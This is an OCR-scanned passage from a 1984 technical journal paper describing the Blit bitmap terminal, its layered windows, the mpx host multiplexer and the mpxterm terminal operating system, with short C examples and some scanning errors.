1984 maintain the state of the screen for the various processes. Instead, the UNIX system can treat the windows like individual terminals. Most window systems permit the user to focus attention on one window at a time, with the other windows maintained statically. Windows on the multiprogrammed UNIX system, however, must be updated asynchronously. That is, characters written to a window by a process must appear immediately, regardless of whether the user’s keyboard is currently connected to that window. Otherwise, compiler errors would not appear until the user asked for them, which would cancel some of the advantages of multiprogramming. Also, as will develop later, the possibility of conveniently controlling asynchronous processes leads to some innovative computing techniques. While the Blit hardware was being designed, we experimented with asynchronous windows on a Blit predecessor built by Dave Ditzel. Following the pattern set by “intelligent terminals,” we programmed the terminal to interpret escape sequences to create, delete, and switch the host character stream between windows. A program on the UNIX system sat between the user programs and the terminal, and inserted escape sequences in the character stream to send data to the correct window. Although this early implementation was clumsy and fragile, it demonstrated the feasibility and power of an asynchronous window terminal and pointed out the issues that must be resolved for a workable multiwindow terminal: 1. Windows must be updated asynchronously. The trial system was primitive but worked well enough to be convincing. 2. The screen is not big enough (regardless of how big it might be). Therefore, windows must overlap. The desires for overlap and asyn- chronism led to the development of layers, an implementation of overlapping, asynchronously updated windows. 3. The software to generate the incremental control information (escape sequence “switch to window x”) from high-level requests (“draw these characters in this window”) was messy — too much state information was maintained by the terminal and guessed at by the UNIX program. The implementation also encouraged attempts to optimize the number of characters sent, which added to the complexity, a situation familiar to authors of screen editors. Putting all data into labeled packets eliminates this confusion and obviates optimization. 4. A simple RS-232 connection is not robust or controllable enough to connect two communicating programs, in this case the UNIX system and the code in the terminal. An error-corrected protocol with flow control is required. 5. To draw graphics in the windows, sending escape sequences is traditional but makes poor use of the processing power of the terminal, and requires the terminal to be preprogrammed with all desired GRAPHICS TERMINAL 33 capabilities. Contrary to popular usage, an intelligent terminal is not an idiot savant; it is one that can be educated. If the terminal could be dynamically programmed, the desired functionality could be added on demand. Our solution was to write a small time-shared operating system for the terminal, called mpxterm (multiplexed terminal), into which we dynamically load programs from the host, customizing the terminal process running in a layer for the execution of a particular graphics task. The Blit therefore developed into a programmable graphics multi- plexer, distributing the terminal resources — screen, mouse, keyboard, RS-232 interface — between terminal processes connected to independ- ent UNIX system processes. Since the design of the terminal’s software was largely dictated by the desired user and programmer interface, the next two sections present the overall user interface and an overview of two programs that run in the multiplexed environment. The subsequent sections outline the implementation of the multiplexing software. 111. WHAT THE USER SEES After logging in to a UNIX system, a Blit user types mpx to the shell. The multiplexed terminal code is then down loaded into the terminal, which takes a few seconds at 19,200 baud and about two minutes at 1200 baud. Mpx term includes all the graphics primitives, but since the graphics primitives and interrupt-level I/O drivers exe- cute out of read-only memory, they are not down loaded. Mpxterm is controlled by the mouse. Of course, programs running in the terminal may also be controlled by the mouse, so some rules must decide which mouse events are interpreted by which process in the terminal. The screen consists of several possibly overlapping layers. Portions of the screen not occupied by layers are “colored” with a distinctive grey texture. Except for internal control and demultiplexer processes of mpxterm, terminal processes are one-to-one with layers. Once the first layer has been created, exactly one layer is the current layer, that is, the layer that receives keyboard characters and interprets mouse motion and button hits. The mouse and keyboard come as a pair; all user input is directed at a single process. The control process contin- ually updates the current process’s mouse coordinates and button state, and a process may ask to be suspended until it is current. When a button is depressed, the current process receives the event if the mouse cursor is pointing at a visible portion of the process’s layer; otherwise, the button hit is interpreted by the mpxterm kernel. To identify the current process, the layers of all noncurrent proc- esses are stippled by a gauzy texture, leaving only the current layer 34 TECHNICAL JOURNAL, OCTOBER 1984 with a clear image* (see Fig. 2). The usual solution to this identification problem is to label the windows, but we elected not to label them because the label takes up useful screen space and either the user or the program must decide what the label is. Neither option is appealing. Another possibility is to distinguish the borders of the layer, but that probably isn’t a strong enough visual clue, especially when the user is concentrating on a portion of a large layer. However, we admit that this identification issue is one of the uglier aspects of the system and that our solution is, at best, a small improvement over others. One decision that differs from the usual, but in which we are on firmer ground, is our requirement that a mouse button hit changes the current layer. In most systems, the location of the mouse defines the current window, but when the current window may be partially or even wholly obscured, this is unworkable. (It makes sense, and is common, for the current layer to be obscured: consider typing instructions to a com- mand in one layer based on data displayed on a graph in another large, nearly full-screen, layer.) The mouse has three buttons, and the Blit software maintains a convention about what the buttons do. The left button is used for pointing. The right button is for global operations, accessed through a menu that appears when the button is depressed and makes a selection when the button is lifted. The middle button is for local operations such as editing. Put simply, the right button changes the position of objects on the screen, and the middle button changes their contents. For example, pointing at a noncurrent layer and clicking the left button makes that layer current. Pointing outside the current layer and pushing the right button presents a menu with entries for creating, deleting, and rearranging layers. Clicking a button while pointing at the current layer invokes whatever function the process in that layer has bound to the button. The next section discusses two programs and how they use the mouse. The state of mouse input is reflected by the cursor tracked by the mouse as it is moved. Usually, the cursor is an arrow pointing to the pixel at the mouse’s location. A program may change the cursor to reflect its state. For example, when the user selects New on the mpxterm menu, the cursor switches to an outlined rectangle with an arrow, indicating that the user should define the size of the layer to be created by sweeping the screen area out with the mouse. Similarly, a user who has selected the Exit menu entry is warned by a skull-and-crossbones * This practice interferes with noncurrent processes drawing in their layers, but most graphics in the Blit world is done in XOR mode, which commutes with the stippling, and the operating system provides a simple routine to help with graphics that are not XOR. GRAPHICS TERMINAL 35 Fig. 2 — A representative Blit screen. The small layer at center right is running the debugger jof f, which is examining the menu data structure in the text editor jim, running in the upper layer. Jim is the current process — its layer is not freckled — and is editing the files for this paper: mpx . trof f is the troff input, and the various fig files are pic descriptions of the illustrations. The lower jim window is editing the description for Fig. 1, and when the user selects write from the menu, the file will be written and the picture in the typesetter emulation layer at the bottom will asynchronously draw the new picture (see the text). The small layer at the bottom is 36 TECHNICAL JOURNAL, OCTOBER 1984 cursor that confirmation is required before that potentially dangerous operation will be executed. IV. TWO APPLICATION PROGRAMS: JIM AND JOFF A variety of programs have been written for the mpxterm environ- ment. As with any graphics terminal, the first few programs were games, which in this case were characterized by being self-playing, at least optionally. On the multiplexed Blit screen, a game program can play itself while the user does putatively useful work in another layer. After the games came a spate of terminal emulators, coinciding with the proliferation of Blits inside our research center and triggered by the desire to promote the programs written for the 24-by-80 displays. This period has passed, and not entirely because a successful emulator has been created. Even strong supporters of the cursor-addressing style of terminal control have accepted the possibilities of a customized terminal program and communications protocol. Many of the 24-by- 80 programs have been supplanted by Blit programs that divide the task between the host arid terminal. Two programs that divide the labor effectively are jim, a text editor, and joff, a debugger for mpxterm programs. References 6 and 7 describe their user interfaces and the details of their implementation. Here we present an overview of their structure and illustrate how they use the programmability of the terminal. Jim is a multifile screen editor that uses the mouse for all editing tasks and the keyboard only for input of text, including file names and strings such as regular expressions for context search. It is written in two pieces: a UNIX program that maintains a copy of the entire file being edited and executes global operations such as context searches on the copy; and a Blit program that does all editing and screen updating. The two programs maintain parallel data structures. The UNIX program maintains a complete copy, while the terminal tracks only what is visible on the display. Because the Blit program keeps the visible page locally, screen update can be done entirely inside running a dynamic UNIX system monitor, reporting the current time, average number of UNIX processes ready to run, and change in that number in the last minute. The textured bar in the upper portion of the layer adjusts constantly to report the fraction of host CPU time consumed (by all users) in, from left to right, regular user computation, low priority user computation, system overhead, character processing, and idle time. The constantly shifting bars give interesting feedback on the quantity and quality of computation on the host computer. The large obscured layer in the middle is running the UNIX shell; the other layers are running down-loaded Blit programs with host support. Note the relationships between the programs: the debugger is examining the editor, but the editor is free to run; the editor and typesetter emulator are asynchronously coupled through the file system; the system monitor runs constantly, and all programs are able to draw on the display at any time, regardless of overlap or user attention. GRAPHICS TERMINAL 37 the terminal; in fact, the UNIX program knows nothing about the appearance of the display. The two programs communicate by a protocol consisting essentially of “insert string” and “delete string” message packets and requests for data, with strings containing arbitrary characters including tabs and newlines. This high-level protocol allows the software to ignore the usual problems of screen update, such as inserting and deleting tab characters and minimizing the length of transmitted strings that update the screen, and makes jim efficient in host cycles compared even to line editors. The update algorithm used by the terminal is discussed in Ref. 7. Users want the screen to update quickly, so the protocol is double-buffered for speed and the two programs usually execute asynchronously, with the terminal in control because that permits user input to be handled immediately even with low commu- nications bandwidth. Unlike most UNIX text editors, j im has no interactive shell escape to invoke the command interpreter from within the editor, because mpx permits the user to create a new layer with a fresh shell at any time. The typical Blit display therefore has a jim layer and a shell layer for typing commands such as compilation requests. Conversely, compiler error messages are trivially maintained by the display while a program is being edited. The j of f debugger is also controlled mostly by the mouse, although the user interface is substantially different from the user interface of jim. The half of jof f that is a UNIX program maintains the large symbol table for the Blit program being debugged, and executes other large-scale tasks such as interpreting C expressions. The code in the terminal displays menus at the user’s request, collects typed input, and monitors and probes the target process. The protocol between these programs falls into two sections: plain text that is displayed in a scrolling region in the debugger’s layer, and remote procedure calls that control the debugging, retrieve information about the target process, and build data structures such as menus and breakpoint tables in the jof f terminal program. The terminal buffers user input such as keyboard characters and mouse button hits, but the host is in control. The menus displayed on a button hit are loaded by the host, and the terminal is not concerned with their contents: all interpretation of user action is done on the UNIX system. This structure is significantly simpler than the protocol in j im, but results in slower response, which is unimportant in a debugger. The jof f debugging program has no direct interface to a text editor (although it displays the text of the source line at a breakpoint), again because the mpx environment allows the user to have an editor avail- able at all times. 38 TECHNICAL JOURNAL, OCTOBER 1984 Both jim and joff down load about 10K bytes of code to the terminal. The half of j im executed on the UNIX system is another 20K of VAX-11* code; joff is about 70K on the VAX* computer. V. WHAT DOES IT ALL MEAN? The Blit application programs, with some noteworthy exceptions, are really not all that interesting. They are fairly ordinary graphics programs, many of them written as playthings by people new to graphics. What is interesting is how the programs work together in the underlying environment. The standard example is compiling a program while editing, with compiler messages appearing in a separate layer without interfering with the editor; but there are more interesting examples. Our local computing environment contains many minicomputers connected by a local area network, controlled by a cluster of five 24- by-80 terminals, so the person maintaining the network can simulta- neously monitor several machines, including those running the net- work control program. With a Blit, a programmer writing network code can, instead, monitor and debug the distributed processes from a single terminal — and from anywhere there’s a Blit, including at home. Similarly, a Blit makes a fine console terminal for a multiprocessor computer. The graphics capabilities can be used for more than text. Computer- Aided Design (CAD) applications are obvious, although there actually have not been many CAD programs written — certainly fewer than have been asked for. Still, it is valuable to be able to use one’s terminal to share graphics and text in separate parts of the screen, for example to edit the textual description of an integrated circuit while inspecting a plot of the circuit in another layer. This extends to looking at separate parts of the same circuit in different layers, or comparing different versions of the same circuit. These are ordinary uses of multiple window environments, but multiprogramming provides new applications. For example, interactive design programs can be assembled out of existing parts, as is done on the UNIX system. The figures in this paper were made with pic, 8 and the pic source edited with jim. There is a program, proof, that interprets the typesetter codes generated by troff for display in a layer on the Blit. A large layer was initialized running the pipeline watch fig 1. pic jpic jtrof f jproof where watch is a variant of cat (the standard UNIX program to display a file’s contents) that prints the file’s contents each time the * Trademark of Digital Equipment Corporation. GRAPHICS TERMINAL 39 file is modified. Therefore, whenever the pic file was written from jim, watch would notice it had been updated and send the new picture description down the pipeline, without starting a fresh picortroff process, for immediate display on the Blit. Syntax errors from pic can be redirected to another layer or to a file, which is then watched in another layer. Although this is hardly a real interactive picture- drawing program, it took only a few seconds to assemble and can fill the gap until an interactive program is written. We discovered an unexpected benefit of asynchronous processes while using joff. With the standard system debuggers, the program being debugged is a child process of the debugger, which means, for example, that a program cannot be attacked with the debugger if it was started independently. This is not fundamental to UNIX, but rather is a property of the usual terminal environment. The debugger must act as an I/O multiplexer between itself, the user, and the target program. When the terminal does the multiplexing, a debugger can be started at any time and applied to any program, including one that is running — even itself. A Blit asteroids game had a bug that caused a rock to pass over the spaceship instead of hitting it. The bug was intermittent — perhaps once out of every 100 collisions — so setting a breakpoint was impract- ical. Instead, joff was loaded and applied to an asteroids game, which was then played for about 10 minutes until the bug occurred. Then joff was told (by a flick of the wrist and two button clicks) to halt the game. A breakpoint on the collision-testing routine was then set in the asteroids program, and the game resumed. The breakpoint fired and the bug was found easily. As a second example, consider the following scenario, debugging joff. Some changes are made to j o f f , making a new version of n j o f f with bugs. A program with bugs intentionally added, say Bugs, is loaded in the Blit as a target for n joff. During testing, n jof f makes a mistake interpreting a data structure in Bugs. An instance of joff is, therefore, loaded to investigate njof f to see where it went wrong, but the correct interpretation of the data structure is unknown, so a second joff is called up as a reference source to look at Bugs. At this point, there are three debuggers and a target program active on the terminal, but the situation is comfortably under control, although inconceivable in a conventional terminal environment. There are more mundane uses of the asynchronism. Many of us have mail boxes on remote machines, reachable only through 1200- or even 300-baud phone lines. A mail message could take one minute to print out at 300 baud, but a Blit user need not be idle during that time. The layer with the remote connection will collect the message while the user does something else in another layer, so the user’s 40 TECHNICAL JOURNAL, OCTOBER 1984 bandwidth can be much higher. If the phone lines to the remote machine are all busy, the user could type until cu remote-machine sleep 600 done to try every ten minutes until the connection is made. The layer with this program will print something like connect failed : line busy every ten minutes. Meanwhile, the user can do anything else on the terminal. Eventually, a line becomes free, the remote machine’s login banner pops up, and the user can switch to that layer and log in. No combination of background processes, job control, and static window contexts can achieve this so simply. VI. MPX: THE HOST PROCESS MULTIPLEXER The multiplexing is handled by software distributed between the host and terminal. A user-level UNIX program, mpx, communicates with a small real-time multiprocess operating system, mpxterm, run- ning in the terminal (see Fig. 3). The design of mpx is sensitive to the details of UNIX system Interprocess Communication (IPC) facilities, which vary widely between UNIX system versions. Mpxterm, on the other hand, is independent of the host except for communication by a simple protocol that it is the job of mpx to interpret; all versions of mpx speak the same protocol. Fig. 3 — Overview of mpx. GRAPHICS TERMINAL 41 The protocol multiplexes I/O on the single RS-232 cable from the terminal to the host. The multiplexing connects UNIX system process groups one-to-one to processes in the terminal. A user on a UNIX system with a conventional terminal types instructions to a shell The shell and the programs it invokes, such as editors and compilers, are members of a single process group, a structure maintained by the kernel. The process group associates processes with a terminal session, mainly to send events such as keyboard interrupts to all processes on the terminal. The mpx program couples each process group to an independent terminal process in the Blit. Four basic capabilities are necessary to implement mpx: 1. Dynamic creation and control of several process groups by a single master process (mpx) 2. Multiplexing of I/O between the process groups and the master 3. A means to prevent the master from being suspended when it reads data from a process that has no characters available while another has data 4. Ability to distinguish control information (such as setting ter- minal modes) and data on an interprocess channel. The original mpx was written using Greg Chesson’s file multiplexing facilities in the 7th edition UNIX system. In UNIX System V, the IPC for mpx is provided by a kernel driver written by Piers Dick- Lauder. The mpx running on the author’s machine exploits the user- level IPC in the character I/O system of the 8th edition. Since that version of mpx is the closest to hand, it will be described here. It comprises about 1600 lines of code, half of which implement the error- correcting protocol between the host and the terminal. A schematic of the mpx/mpxterm pair is in Fig. 3. Character processing in the 8th edition kernel is done by a sequence of coroutines called line disciplines, 9 each of which is a full-duplex 1/ O pseudoprocess that performs its portion of the processing and hands the data along to the next line discipline. They are not proper processes because the kernel maintains no call records across scheduling bound- aries. They are connected together serially to achieve the desired function, much like a full-duplex shell pipeline. For example, a ter- minal connected to a user program on our local area network is connected, from the bottom up, to a network driver (essentially half of a line discipline, the other half residing in the network), a line discipline interpreting the network protocol, a standard terminal line discipline that provides services such as character echo and correction of typing mistakes, and another half-discipline to connect to user level. To connect a terminal, there must be a name in the file system to attach to the associated data structure in the kernel. The directory / 42 TECHNICAL JOURNAL, OCTOBER 1984 dev/pt contains even-odd pairs of junctor devices, each of which is called a pseudoterminal, or pt. If one process opens an odd-numbered pt file and another opens the corresponding even file, then data written on one file can be read from that file’s partner, in symmetrical full-duplex fashion. The odd-numbered member of a pair is the master. Masters and slaves differ only in the rules for opening; I/O is sym- metric. Master pt files may be open in at most one process. A process wishing to establish a connection opens an odd-numbered file; then one or more slave processes may open the corresponding even-num- bered file and communicate with the master. Multiplexed I/O is done by a primitive called select. Because I/O can block — if a process reads from a device that has no data available, the process is suspended until data arrive — mpx cannot simply read from the active processes in turn, or it may wait for data from one process while another has data. The select call returns a bit vector indicating which file descriptors have data to be read, or, according to an argument in the call, which file descriptors may be written to without similarly being suspended until the data are read at the other end. Figure 4 illustrates the interconnection of these components. Fol- lowing the path from a user process such as a shell, running in a layer, characters enter the kernel and flow through a terminal discipline that does terminal processing for the user process, such as echoing char- acters typed by the user. The bottom of the terminal discipline connects to the slave side of the pseudoterminal. The characters cross to the master side, where they are passed through a message line discipline out of the kernel to mpx. The message discipline converts all information on the path into data messages, each of which is USER KERNEL UNIX SYSTEM BUT Fig. 4 — Interprocess communication in mpx. GRAPHICS TERMINAL 43 prefixed by a header identifying the type of the message. Ordinary characters are tagged data, system I/O control requests (ioctl) are marked as such, and some other control messages are translated, such as hangup, which occurs when the channel shuts down, for example, when the shell exits. These messages are read by mpx, which identifies the channel with data using a select call. Mpx interprets the data, which for ordinary characters merely involves reformatting the mes- sage (adding a tag specifying which layer will receive the data and a cyclic redundancy check for error detection and recovery) and sending it down its standard output to the terminal. Data from the process is read from a channel established by mpx (see the discussion of layer creation below), while the connection to the Blit is through the standard input and output, because mpx is multiplexing its subpro- cesses onto its terminal, the Blit. On the other hand, the standard input and output of the shell process in a layer are connected to the mpx channel for that layer. On their way from mpx to the Blit, the characters enter the kernel again, where they pass through a terminal discipline (the one installed by the login program when the user signed on to the system before running mpx; for data transparency this discipline is actually largely disabled) and out to the terminal. In the Blit, the layer identification tag is stripped off, and the data are placed in the input buffer of the terminal process in the appropriate layer. Information flowing in the other direction follows the reverse path. Although this structure sounds complicated, it is actually fairly clean: the delicate requirements of the interprocess communication are met by connecting together small piece parts with simple inter- faces. As a result, the multiplexing does not interfere with other programs, in contrast, for example, with the original mpx using mul- tiplexed files, which prohibited running in layers programs that them- selves multiplexed. Moreover, because the 8th edition UNIX system I/O was written precisely to do this sort of stream processing and interconnection, it is efficient. Perhaps the most brutal test of effi- ciency is down loading a program into a terminal process: the terminal does almost no processing of the program text, so it is constantly waiting for data from the host. After each 64 bytes of data sent, an acknowledgment packet from the terminal arrives and is processed by mpx as part of the communications protocol, so there is frequent scheduling between the down loader and mpx. Our UNIX system has no assembly language assist for terminal I/O, the hardware generates an interrupt for every character sent or received, and the data from the down loader cross the kernel-user interface twice. Despite this overhead, at 19,200 baud the RS-232 line is almost saturated, deliv- ering over 16,000 user bits per second into the terminal and consuming 44 TECHNICAL JOURNAL, OCTOBER 1984 70 percent of a VAX-11/750* machine’s capability (this implies a maximum of about 400 instructions executed per byte on the VAX system). To our knowledge, no other version of the system on the same hardware can deliver down-loaded programs faster than about 6000 baud. When the user on the Blit asks to create a new layer, the following events occur. The terminal allocates a layer data structure on the display and creates a terminal process to manage it. It then sends a message on its RS-232 connection, the standard input of mpx, stating that a layer has been created and specifying the channel in the communications protocol onto which its data will be multiplexed. Then mpx opens an idle master pt file, and the channel number (different from the communications channel) returned by the open is the connection of mpx to the subprocess about to be created. Mpx pushes a message line discipline onto the stream on the master side of the pseudoterminal and forks to create a child process. The child closes all of its file descriptors and opens the slave side of the pseudoteletype, which becomes its standard input and is duplicated to form its standard output and standard error output. It then pushes a terminal line discipline onto the stream and initializes the terminal modes. Finally, it establishes itself as a separate process group and executes a shell. When the shell begins, it prints a prompt on its standard output, which flows through the path outlined above and eventually arrives in the input buffer of the terminal process, which copies it to the display, and the act of creation is complete. The elapsed time is perhaps a half second. VII. MPXTERM: THE TERMINAL OPERATING SYSTEM Inside the Blit runs a tiny operating system that provides essentially the same multiprogramming and data transparency as mpx. It is basically a mirror image of mpx, but with considerably less mechanism, largely because the multiplexing is built into the operating system rather than being constructed at user level. The basic structure of the system is a set of independent processes scheduled round robin that call a primitive queue-based kernel to service I/O requests. At the time of writing, mpxterm is 1627 lines of C, excluding code for the protocol (which uses the same source files as mpx) and the graphics primitives, but including all the user interaction and I/O primitives; and 204 lines of assembler. The assembler lines include 11 lines to switch stacks, 108 lines to interface interrupt routines to C code, and 85 repetitive lines to interface to C code after a process traps. * Trademark of Digital Equipment Corporation. GRAPHICS TERMINAL 45 Process switching is performed only at the process’s request; there is no preemptive scheduling. Since the Blit is a terminal, and not a general-purpose computer, the processes all do some form of input or output, whether to read characters from the host or keyboard, or even just display something on the screen. If a process wants a character from, say, the keyboard, but none has been typed, it can suspend itself by executing wait (KBD) which says “wait until a keyboard character becomes available.” Be- cause the display is updated at 30 Hz, a display program will usually suspend execution until the screen reflects the change it has made in memory. Therefore, although the programmer must be aware that the CPU is being shared among other processes, the habit of relinquishing the processor fits smoothly into the discipline required for real-time graphics programming. This structure keeps mpxterm simple (and easy to debug). Except for the lowest level of I/O, which must protect against device interrupts, there are no semaphores or interlocks in the kernel; the process control part of mpxterm was written and debugged in an evening. The devices — mouse, keyboard, and host RS-232 port— are all in- terrupt driven. The keyboard and RS-232 port place their characters into queues that are read by server processes running at user level (i.e., with processor interrupts enabled). The mouse buttons generate an interrupt when their state changes, and their value is kept in a global data structure, along with the mouse position. As the mouse moves, the hardware updates two registers in the I/O page but gener- ates no interrupts. Instead, the mouse position on the screen is updated during vertical blanking by a low-priority interrupt routine that runs off a 60-Hz clock coupled to the start of vertical retrace. Because of the 30-Hz display refresh, there is no reason to update it more frequently. The clock interrupt and mouse button interrupt schedule a control process that multiplexes the mouse among the user processes. At any time, only one user process receives mouse tracking and button hit information from the control process. Any other process attempting to use the mouse is suspended until the user indicates by a button hit, handled by the control process, that the mouse and keyboard should be bound to that process instead. A second system process, the demultiplexer, reads the characters from the host input queue, unpacks the messages, and executes the error-correcting protocol. Correctly received messages are placed in the input queue of the associated user processes. The error correction is transparent to the processes; as far as they can tell, they have a 46 TECHNICAL JOURNAL, OCTOBER 1984 direct link to a plain RS-232 wire, except that no flow control is necessary on either end (compare this to the control-S/control-Q or NUL-padding flow control necessary with many standard terminals). The demultiplexer occasionally receives control messages, indicating, for example, that a terminal process is to begin executing the down- load receiving procedure preparatory to loading a new terminal pro- gram into a layer. All resources are shared among the processes in the Blit. Memory allocation occurs through two primitives: alloc allocates memory at fixed locations, to store programs, for example; and gcaiioc allocates relocatable memory in a compacted arena, to store bitmaps and strings. This split structure is imposed by the open addressing of C and the necessity to compact the arena containing dynamically allocated bit- maps. User processes and the kernel allocate using the same code, and each allocated object is tagged with a pointer to the process that owns it, so storage can be reclaimed when a program exits. Storage allocation is simplified by the lack of preemptive scheduling; interlocks during compaction are unnecessary, since allocations are atomic. Because the hardware does not provide memory management and our C compiler does not generate position-independent code, down- loaded programs are relocated in the host to an address returned by alloc in the Blit. Relocation is not expensive; the text editor, which is about 10K bytes long, is relocated in three seconds and down loads in about six seconds at 19,200 baud. This is comparable to the initialization time of most conventional screen editors. The Blit hardware provides one feature for protection. Read or write references to the first eight bytes of the processor’s address space generate an interrupt that is caught by the kernel, which halts the offending process. Because a common C programming error is to dereference through a null-valued pointer, this small feature has saved mpxterm many times. For an unprotected system, mpxterm is pleasantly robust. It is certainly shut down quietly at the end of a working day far more often than it crashes. Left running, its mean up time is several days, even during periods of program development. VIII. PROGRAMMING Processes in the terminal may be loaded, by a procedure analogous to executing a UNIX program, to customize the terminal for a partic- ular task. The programmer’s interface to mpxterm is unaffected by other programs running in the terminal. To a rough approximation, the programming environment is a virtual machine: programs run as though they have a keyboard, mouse, display, and host RS-232 con- nection all to themselves. GRAPHICS TERMINAL 47 The screen is multiplexed using the idea of a layer , 3 which supports all bitmap operations, especially bi tbit, on an extended bitmap data structure that allows overlap. Each Blit process has a global variable called display, which is the layer data structure for the portion of the screen occupied by the process. The display data structure contains the coordinates of the screen rectangle, used to clip graphics operations, and a list of off-screen bitmaps containing obscured con- tents of the layer. To the programmer, display is like an ordinary bitmap, obscured or not, and by executing graphics primitives on display the process can draw on its screen regardless of overlap, and without communicating with a window manager when the layer con- figuration changes. As far as the process is concerned, it has its portion of the screen to itself. There is no “window manager” in the conven- tional sense — bitbit* is the window interface. Characters arriving from the host are split by the demultiplexer into separate streams and placed in the input queues of the appropriate processes. From a process’s point of view, the interface to the host is an ordinary byte stream. The keyboard is handled differently, because the stream of typed characters is directed at a process by the user. Still, the idea is the same: each process sees an ordinary byte stream from the keyboard and is oblivious to characters directed to other processes. Character I/O in mpxterm is nonblocking. Two routines, kbdchar and hostchar, read characters from the input queues for the process. If no characters are available, they return an error indication but do not block, because typical terminal applications must be ready to receive input from either the host or the keyboard. When a process wants to suspend until characters become available, it calls wait with an argument bit vector stating which resources are of interest, wait returns a bit vector indicating which queues have data, so the inner loop of a typical terminal program is something like this: int resource; whi le ( TRUE ) { resource = wait ( HOST | KBD ) ; if (resource £ HOST) draw_on_screen ( hostchar ( ) ) ; if (resource £ KBD) sendchar ( kbdchar ( ) ) ; * The lbitblt primitive, discussed in the layers paper, 3 is aliased to bi tbit in the mpxterm programming environment, so the distinction between bitmaps and layers vanishes — the programmer treats layers exactly like bitmaps. 48 TECHNICAL JOURNAL, OCTOBER 1984 Sendchar sends characters to the host through the error-corrected channel, wait suspends the process, by calling another process that is ready to run, until a character becomes available on either queue and no other process is using the CPU. If no other process is ready, wait returns immediately when a character becomes available. Another system call, sleep, suspends a process for a specified number of ticks of the 60-Hz clock, by waiting for a timer set by a nonblocking alarm resource, sleep is roughly: sleep(n) int n ; i * alarm(n) ; /* set the timer n ticks in the future */ wait ( ALARM ) ;/* suspend until timer fires */ I but includes protection in case the process has alarms pending. Since the hardware clock is coupled to the vertical retrace, sleep is often used to suspend a process until the picture it has placed in memory is visible on the screen. Each process has a global data structure describing the mouse state — position and button status — that is updated asynchronously whenever the user has assigned the mouse to that process. A process may wait until it owns the mouse by calling wait (MOUSE) Therefore, to wait for a button to be depressed, a process would execute while (mouse . buttons = = 0 ) wait ( MOUSE ) ; The following code draws line segments connecting mouse positions as the mouse moves: Point p; p = mouse .xy; /* f irst point , where mouse points now */ for (;;) ( q = mouse . xy ; segment ( Sdisplay , p, q, OR); P = q; sleep( 1 ) ; /* wait for mouse and display update */ i The notation ^display indicates that the address, rather than the value, of the display bitmap structure is passed to segment, or specifies that the bit pattern of the line is to be OR’ed into display GRAPHICS TERMINAL 49 memory. Line segments are drawn half-open, so adjacent line segments share no points. As well as I/O, all graphics primitives are implemented as system calls, to interface to the layer code but make everything look like ordinary bitmap graphics. Therefore, the system call interface must be very fast, or system call overhead will dominate graphics perform- ance. Because there is no memory management, processes all live in the same address space, and system calls are indirect subroutine calls through a vector at a known location. The execution penalty is only one extra instruction for a system call compared to an ordinary procedure call. The mapping to the vector is done from C by defining the system calls in a header file, so the mechanism is transparent to the programmer. Programs are loaded into the Blit from the host computer’s disc by a user program that communicates with a special program load process in the terminal. By default, a layer runs a conventional “dumb” terminal emulator. When the UNIX program executes a bootstrap iocti request to initiate program loading, mpx transmits the request on a reserved communications channel. The Blit demultiplexer process shuts down the terminal emulator and begins the program loader process, which allocates memory, returns to the system the base address of the program, and then copies (asynchronously with the other terminal processes) the relocated program from its host queue into memory. Since the channel is error corrected, the loading protocol just relocates the program and writes, unformatted, the relocated binary; no checksumming or verification is necessary. When the loading is complete, the program begins executing. If it executes the exit system call, the layer remains active but is reinitialized with the dumb terminal emulator. IX. RETROSPECTION, INTROSPECTION, AND CONCLUSIONS The Blit has taught us that multiprogramming has been underused. A user is capable of running several related or unrelated programs in parallel if the user interface makes it easy to control their execution. The Blit has also shown the advantages of isolating the issues of user interaction from the operating system. All of the Blit software is user- level code, yet the Blit environment feels naturally coupled to the UNIX system. The system really knows nothing about the multiplex- ing going on; the user is just running more processes than usual. A large part of the Blit’s success can probably be attributed to our concentration on the graphics and user interface issues, rather than the development of a new integrated, distributed programming envi- ronment. There are a number of things worth noting that were done 50 TECHNICAL JOURNAL, OCTOBER 1984 well on the Blit, and a number that could be improved. To end on an upbeat note, we will discuss the mistakes first. Although the graphics is fast enough, the hardware is not big enough. That is, memory is tight when working on big programs, and there isn’t enough offscreen bitmap storage. The greatest problem, though, is certainly the low bandwidth. Putting aside the issues of availability, simplicity, and portability, RS-232 is not fast enough for file I/O. The text editor must be written in two parts, using the terminal much like a cache. Consider context searches at 1200 baud, which would other- wise require sending the entire file, perhaps hundreds of thousands of characters long, over the phone line. Unfortunately, writing one pro- gram in two pieces is much harder than writing two programs. Still, we don’t want local disc. The Blit model, using an inexpensive dedi- cated front-end for high-quality interaction on a traditional time- sharing system, is a powerful one, and we prefer increasing the memory and bandwidth, leaving the basic structure the same, to adding disc and therefore expense, noise, and the proliferation of local copies of software. Mpxterm does not exploit multiprogramming enough itself. Layers and terminal processes are one-to-one, counter to the current fads of message-based systems. There certainly needs to be more terminal IPC so, for example, text in one layer may be copied to another using the j im cut and paste operators. Perhaps most importantly, the current Blit software is tending towards disintegration: this layer is an editor and this layer is a debugger and this layer is a circuit design program. This trend is counter to the uniformity of environments that makes a system easy to use, and misses some obvious simplifications. One obvious change would be to push text editing to a lower level, so text anywhere on the screen, not just in a j im layer, could be edited with the mouse. Mpxterm is currently being rewritten to support editing of displayed text. Some things were done well. One of the Blit’s competitive advan- tages was that the two people (Locanthi and Pike) who designed the hardware and software were the people who most wanted to use it. Both understood the hardware and software issues, and the hardware and software were designed together to work together, rather than by competing committees. Particularly in the design of the graphics memory, iterations of the hardware design were punctuated by writing test software to develop a feeling for the hardware/software trade-offs, and where best to resolve them. Finally, the bulk of the software was written by the same two people, and mpx and mpxterm were written by one (Pike). Simplicity rules the Blit software. The operating system has no memory management and the simplest process structure possible. The GRAPHICS TERMINAL 51 user interface is devoid of the usual frills and bunting that decorate most graphics environments. For example, there is only one type of menu — a list of strings. Many menu styles can be envisioned, and they would certainly be used if implemented, but only one is necessary. The Blit graphics library is about 8K bytes of compiled code, of which over 3K is bitbit, texture, and the line-drawing primitives. This is a small fraction of the size of most interactive graphics systems. The Blit is inexpensive. For little more than the cost of replacing the 24-by-80 terminals, everyone in our research center, including the support staff, has a Blit, and several have two. Also, replacing termi- nals is a simple way to migrate to a new environment. The system underneath is still the same UNIX system, in fact — so nothing was left behind, and only new things had to be implemented. From the user’s point of view, the Blit has brought about a far- reaching change in attitude: in conventional environments, even on sophisticated time-sharing systems, the user must often wait for the machine to complete some task such as a compilation. On the Blit, the machine is always ready to do something new — the user is in control, not the machine. X. ACKNOWLEDGMENTS Many people helped and influenced the development of the Blit. Most important among them is Bart Locanthi, who designed and built the terminal and much of the underlying graphics software. Piers Dick-Lauder wrote the error-correcting protocol in mpx and 